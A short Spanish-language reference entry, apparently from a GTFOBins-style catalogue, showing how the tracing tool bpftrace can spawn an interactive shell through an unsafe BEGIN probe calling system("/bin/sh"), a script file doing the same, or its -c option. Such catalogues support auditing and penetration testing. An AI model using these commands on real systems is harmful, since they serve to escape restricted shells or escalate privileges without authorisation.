./bpftrace --examples
Funciones y ejemplos de uso
shell
bpftrace --unsafe -e 'BEGIN {system("/bin/sh 1<&0");exit()}'
echo 'BEGIN {system("/bin/sh 1<&0");exit()}' >/path/to/temp-file
bpftrace --unsafe /path/to/temp-file
bpftrace -c /bin/sh -e 'END {exit()}'
./related --binary=bpftrace
Binarios relacionados
Comparten al menos una función con bpftrace.